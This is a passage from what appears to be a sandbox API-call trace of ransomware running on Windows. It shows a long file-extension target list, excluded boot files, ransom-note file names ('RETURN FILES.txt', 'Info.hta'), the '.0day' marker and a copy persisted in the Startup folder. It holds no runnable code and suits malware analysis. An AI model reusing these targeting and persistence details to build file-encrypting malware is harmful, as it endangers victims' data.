(HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4dd768 [0261.472] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8) returned 0x521ec8 [0261.472] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4dd780 [0261.472] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4dd798 [0261.472] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4dd7b0 [0261.472] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4dd7c8 [0261.472] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4dda20, Size=0x200) returned 0x4dda20 [0261.472] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4dd7e0 [0261.472] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8) returned 0x521ed8 [0261.472] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x522298 [0261.472] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5222b0 [0261.472] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5222c8 [0261.472] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5222e0 [0261.472] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5222f8 [0261.472] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x522310 [0261.472] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x522328 [0261.472] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x522340 [0261.472] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x522358 [0261.472] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x522370 [0261.472] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x522388 [0261.472] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5223a0 [0261.472] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5223b8 [0261.472] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x5223d0 [0261.472] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x5223e8 [0261.472] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x522400 [0261.472] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x522418 [0261.472] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x522430 [0261.472] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x522448 [0261.472] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x522460 [0261.472] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x522478 [0261.472] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8) returned 0x521ee8 [0261.472] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x522490 [0261.472] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5224a8 [0261.473] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5224c0 [0261.473] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8) returned 0x521ef8 [0261.473] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5224d8 [0261.473] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x5224f0 [0261.473] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x522508 [0261.473] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x522520 [0261.473] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x522538 [0261.473] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x522550 [0261.473] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x522568 [0261.473] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x522580 [0261.473] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x522598 [0261.473] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x5225b0 [0261.473] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5225c8 [0261.473] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5225e0 [0261.473] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5225f8 [0261.473] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x522610 [0261.473] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x522628 [0261.473] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x522640 [0261.473] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x522658 [0261.473] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x522698 [0261.473] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5226b0 [0261.473] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5226c8 [0261.473] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5226e0 [0261.473] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8) returned 0x521f08 [0261.473] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x6) returned 0x521f18 [0261.473] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5226f8 [0261.473] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x522710 [0261.473] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x522728 [0261.473] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x522740 [0261.473] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x522758 [0261.473] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x522770 [0261.473] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x522788 [0261.473] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5227a0 [0261.473] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5227b8 [0261.473] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5227d0 [0261.473] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x5227e8 [0261.473] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x522800 [0261.473] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x522818 [0261.473] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4dda20, Size=0x400) returned 0x522a80 [0261.473] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x522830 [0261.474] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x522848 [0261.474] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x522860 [0261.474] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x522878 [0261.474] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x522890 [0261.474] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5228a8 [0261.474] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x5228c0 [0261.474] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5228d8 [0261.474] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5228f0 [0261.474] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x522908 [0261.474] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8) returned 0x521f28 [0261.474] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x522920 [0261.474] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x522938 [0261.474] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x522950 [0261.474] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x522968 [0261.474] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x522980 [0261.474] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x522998 [0261.474] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xe) returned 0x5229b0 [0261.474] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5229c8 [0261.474] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5229e0 [0261.474] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5229f8 [0261.474] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x522a10 [0261.474] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x522a28 [0261.474] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x522a40 [0261.474] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x522a58 [0261.474] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4fee98 [0261.474] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8) returned 0x521f38 [0261.474] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4feeb0 [0261.474] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4feec8 [0261.474] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4feee0 [0261.474] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4feef8 [0261.474] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4fef10 [0261.474] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4fef28 [0261.474] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4fef40 [0261.474] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4fef58 [0261.474] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4fef70 [0261.474] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xe) returned 0x4fef88 [0261.474] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4fefa0 [0261.475] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xe) returned 0x4fefb8 [0261.475] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4fefd0 [0261.475] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4fefe8 [0261.475] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4ff000 [0261.475] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4ff018 [0261.475] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4ff030 [0261.475] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x4ff048 [0261.475] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4ff060 [0261.475] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4ff078 [0261.475] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4ff090 [0261.475] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4ff0a8 [0261.475] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4ff0c0 [0261.475] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4ff0d8 [0261.475] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4ff0f0 [0261.475] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4ff108 [0261.475] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4ff120 [0261.475] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4ff138 [0261.475] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4ff150 [0261.475] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4ff168 [0261.475] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4ff180 [0261.475] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4ff198 [0261.475] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4ff1b0 [0261.475] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4ff1c8 [0261.475] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4ff1e0 [0261.475] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4ff1f8 [0261.475] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x12) returned 0x4da1b8 [0261.475] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4ff210 [0261.475] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4ff228 [0261.475] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4ff240 [0261.475] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4ff258 [0261.475] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4ff298 [0261.475] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4ff2b0 [0261.475] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4ff2c8 [0261.475] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4ff2e0 [0261.475] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4ff2f8 [0261.475] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4ff310 [0261.475] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4ff328 [0261.475] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4ff340 [0261.475] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4ff358 [0261.476] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4ff370 [0261.476] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4ff388 [0261.476] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4ff3a0 [0261.476] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4ff3b8 [0261.476] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4ff3d0 [0261.476] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4ff3e8 [0261.476] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4ff400 [0261.476] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x4ff418 [0261.476] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x4ff430 [0261.476] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x4ff448 [0261.476] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xe) returned 0x4ff460 [0261.476] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x4ff478 [0261.476] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8) returned 0x521f48 [0261.476] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4ff490 [0261.476] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8) returned 0x521f58 [0261.476] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4ff4a8 [0261.476] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4ff4c0 [0261.476] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4ff4d8 [0261.476] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x4ff4f0 [0261.476] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x4ff508 [0261.476] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4ff520 [0261.476] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x4ff538 [0261.476] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4ff550 [0261.476] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4ff568 [0261.476] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x4ff580 [0261.476] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4ff598 [0261.476] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x4ff5b0 [0261.476] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x4ff5c8 [0261.476] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4ff5e0 [0261.476] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8) returned 0x521f68 [0261.476] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4ff5f8 [0261.476] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4ff610 [0261.476] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x522a80, Size=0x800) returned 0x4ffa80 [0261.476] lstrlenW (lpString=".1cd;.3ds;.3fr;.3g2;.3gp;.7z;.accda;.accdb;.accdc;.accde;.accdt;.accdw;.adb;.adp;.ai;.ai3;.ai4;.ai5;.ai6;.ai7;.ai8;.anim;.arw;.as;.asa;.asc;.ascx;.asm;.asmx;.asp;.aspx;.asr;.asx;.avi;.avs;.backup;.bak;.bay;.bd;.bin;.bmp;.bz2;.c;.cdr;.cer;.cf;.cfc;.cfm;.cfml;.cfu;.chm;.cin;.class;.clx;.config;.cpp;.cr2;.crt;.crw;.cs;.css;.csv;.cub;.dae;.dat;.db;.dbf;.dbx;.dc3;.dcm;.dcr;.der;.dib;.dic;.dif;.divx;.djvu;.dng;.doc;.docm;.docx;.dot;.dotm;.dotx;.dpx;.dqy;.dsn;.dt;.dtd;.dwg;.dwt;.dx;.dxf;.edml;.efd;.elf;.emf;.emz;.epf;.eps;.epsf;.epsp;.erf;.exr;.f4v;.fido;.flm;.flv;.frm;.fxg;.geo;.gif;.grs;.gz;.h;.hdr;.hpp;.hta;.htc;.htm;.html;.icb;.ics;.iff;.inc;.indd;.ini;.iqy;.j2c;.j2k;.java;.jp2;.jpc;.jpe;.jpeg;.jpf;.jpg;.jpx;.js;.jsf;.json;.jsp;.kdc;.kmz;.kwm;.lasso;.lbi;.lgf;.lgp;.log;.m1v;.m4a;.m4v;.max;.md;.mda;.mdb;.mde;.mdf;.mdw;.mef;.mft;.mfw;.mht;.mhtml;.mka;.mkidx;.mkv;.mos;.mov;.mp3;.mp4;.mpeg;.mpg;.mpv;.mrw;.msg;.mxl;.myd;.myi;.nef;.nrw;.obj;.odb;.odc;.odm;.odp;.ods;.oft;.one;.onepkg;.onetoc2;.opt;.oqy;.orf;.p12;.p7b;.p7c;.pam;.pbm;.pct;.pcx;.pdd;.pdf;.pdp;.pef;.pem;.pff;.pfm;.pfx;.pgm;.php;.php3;.php4;.php5;.phtml;.pict;.pl;.pls;.pm;.png;.pnm;.pot;.potm;.potx;.ppa;.ppam;.ppm;.pps;.ppsm;.ppt;.pptm;.pptx;.prn;.ps;.psb;.psd;.pst;.ptx;.pub;.pwm;.pxr;.py;.qt;.r3d;.raf;.rar;.raw;.rdf;.rgbe;.rle;.rqy;.rss;.rtf;.rw2;.rwl;.safe;.sct;.sdpx;.shtm;.shtml;.slk;.sln;.sql;.sr2;.srf;.srw;.ssi;.st;.stm;.svg;.svgz;.swf;.tab;.tar;.tbb;.tbi;.tbk;.tdi;.tga;.thmx;.tif;.tiff;.tld;.torrent;.tpl;.txt;.u3d;.udl;.uxdc;.vb;.vbs;.vcs;.vda;.vdr;.vdw;.vdx;.vrp;.vsd;.vss;.vst;.vsw;.vsx;.vtm;.vtml;.vtx;.wb2;.wav;.wbm;.wbmp;.wim;.wmf;.wml;.wmv;.wpd;.wps;.x3f;.xl;.xla;.xlam;.xlk;.xlm;.xls;.xlsb;.xlsm;.xlsx;.xlt;.xltm;.xltx;.xlw;.xml;.xps;.xsd;.xsf;.xsl;.xslt;.xsn;.xtp;.xtp2;.xyze;.xz;.zip;") returned 1776 [0261.477] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x520e78 | out: hHeap=0x4a0000) returned 1 [0261.477] lstrlenW (lpString="") returned 0 [0261.477] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x5003d8 | out: hHeap=0x4a0000) returned 1 [0261.477] lstrlenW (lpString=".0day") returned 5 [0261.477] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d94c8, Size=0x8) returned 0x4d94c8 [0261.477] lstrlenW (lpString=".0day") returned 5 [0261.477] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x5003d8 | out: hHeap=0x4a0000) returned 1 [0261.477] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x500408, Size=0x20) returned 0x4b4618 [0261.477] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4b4618, Size=0x40) returned 0x4dacd0 [0261.477] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4dacd0, Size=0x80) returned 0x51ee90 [0261.477] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x521fd8, Size=0x8) returned 0x521fe8 [0261.477] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x521fe8, Size=0x10) returned 0x500408 [0261.477] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x500408, Size=0x20) returned 0x4b45f0 [0261.477] lstrlenW (lpString="boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys;") returned 48 [0261.477] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x51ee90 | out: hHeap=0x4a0000) returned 1 [0261.477] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x500438, Size=0x20) returned 0x4d9b70 [0261.477] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d9b70, Size=0x40) returned 0x4dacd0 [0261.477] lstrlenW (lpString="RETURN FILES.txt") returned 16 [0261.477] lstrlenW (lpString="RETURN FILES.txt") returned 16 [0261.477] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dacd0 | out: hHeap=0x4a0000) returned 1 [0261.477] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x500438, Size=0x20) returned 0x4d9b70 [0261.477] lstrlenW (lpString="Info.hta") returned 8 [0261.477] lstrlenW (lpString="Info.hta") returned 8 [0261.477] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9b70 | out: hHeap=0x4a0000) returned 1 [0261.478] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x500688, nSize=0x7fff | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\agent1c.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\agent1c.exe")) returned 0x67 [0261.478] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x500688 | out: hHeap=0x4a0000) returned 1 [0261.478] lstrlenW (lpString="agent1c.exe") returned 11 [0261.478] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4b45f0, Size=0x40) returned 0x4dacd0 [0261.478] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x500438, Size=0x20) returned 0x4b45f0 [0261.478] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x500438, Size=0x20) returned 0x4d9b70 [0261.478] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d9b70, Size=0x40) returned 0x4dad18 [0261.478] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4dad18, Size=0x80) returned 0x51ee90 [0261.478] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x51ee90, Size=0x100) returned 0x4dda20 [0261.478] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0261.478] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dda20 | out: hHeap=0x4a0000) returned 1 [0261.478] ExpandEnvironmentStringsW (in: lpSrc="%windir%;", lpDst=0x500688, nSize=0x8000 | out: lpDst="C:\\Windows;") returned 0xc [0261.478] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x522e80 | out: hHeap=0x4a0000) returned 1 [0261.478] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x500688 | out: hHeap=0x4a0000) returned 1 [0261.478] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x521fe8, Size=0x8) returned 0x521fd8 [0261.478] lstrlenW (lpString="%windir%;") returned 9 [0261.478] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b45f0 | out: hHeap=0x4a0000) returned 1 [0261.478] lstrlenW (lpString="C:\\Windows;") returned 11 [0261.478] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4eee78 | out: hHeap=0x4a0000) returned 1 [0261.478] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x500450, Size=0x20) returned 0x4b45f0 [0261.479] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4b45f0, Size=0x40) returned 0x4dad18 [0261.479] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4dad18, Size=0x80) returned 0x51ee90 [0261.479] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x51ee90, Size=0x100) returned 0x4dda20 [0261.479] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x522018, Size=0x8) returned 0x522028 [0261.479] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x522028, Size=0x10) returned 0x500498 [0261.479] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x500498, Size=0x20) returned 0x4b45f0 [0261.479] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x521fe8, Size=0x8) returned 0x522028 [0261.479] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x521ff8, Size=0x8) returned 0x521fe8 [0261.479] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x522018, Size=0x8) returned 0x522038 [0261.479] 